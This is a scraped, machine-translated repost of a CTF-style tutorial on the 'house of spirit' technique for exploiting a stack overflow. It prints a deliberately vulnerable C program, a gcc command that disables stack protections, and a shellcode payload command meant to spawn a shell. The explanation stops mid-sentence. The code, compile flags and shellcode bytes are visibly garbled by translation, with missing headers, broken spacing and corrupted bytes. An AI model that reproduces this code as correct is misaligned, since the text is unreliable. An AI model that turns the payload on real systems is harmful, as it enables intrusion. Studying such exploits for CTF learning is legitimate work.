[overflow utilization skills] house of spirit friendly stack overflow 01/23 Update SLTechnology News&Howtos

[overflow utilization skills] house of spirit friendly stack overflow

2025-01-23 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

Learn a stack overflow utilization technique introduced in L-CTF and record it.

The sample code is as follows:

/ * * blackngel's vulnerable program slightly modified by gb_master * / # include # include # include void fvuln (char * str1, int age) {char * ptr1, name [32]; int local_age; char * ptr2; local_age = age; ptr1 = (char *) malloc (256); printf ("\ nPTR1 = [% p]", ptr1); strcpy (name, str1); printf ("\ nPTR1 = [% p]\ n", ptr1); free (ptr1) Ptr2 = (char *) malloc (40); snprintf (ptr2, 40-1, "% s is% d years old", name, local_age); printf ("\ n% s\ n", ptr2);} int main (int argc, char * argv []) {int pad [10] = {0,0,0,0,0,0,10,0,0}; if (argc = 3) fvuln (argv [1], atoi (argv [2])); return 0;}

The compilation command is as follows:

Gcc hos.c-M32-fno-stack-protector-mpreferred-stack-boundary=2-mno-accumulate-outgoing-args-z execstack-o hos

To compile in Ubuntu 14 Server, you need to install the development package, otherwise an error will be reported that the sys/cdefs.h file cannot be found:

Sudo apt-get install libc6-dev-i386

The key idea here is to change the address of the local variable to an address in the stack through overflow, and set the size field in the fake address to the effective size of a fastbin, so that it can be successfully free. The later malloc will reapply and use this block of memory, and the snprintf function will write data to it, so that the return address of the function can be overwritten and finally getshell.

The memory distribution of local variables is as follows:

0xffffd03c name0xffffd05c ptr20xffffd060 ptr10xffffd064 local_age

The sample test commands are as follows:

. / hos `python-c 'import sys; sys.stdout.write ("\ x31\ xc0\ xeb\ x14\ x44\ xd0\ xff\ xff\ x6a\ X0b\ x58\ x31\ xf6\ x56\ x68\ x2f\ x2f\ x73\ x68\ x68\ x2f\ x69\ x6e\ x89\ xe3\ X31\ xc9\ x89\ xcd\ x80\ x90" + "\ X01\ xd0\ xFF\ xFF" + "\ X30") `48

There is a problem here. You can getshell through GDB debugging. If you execute it directly, you will report a segment error:

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.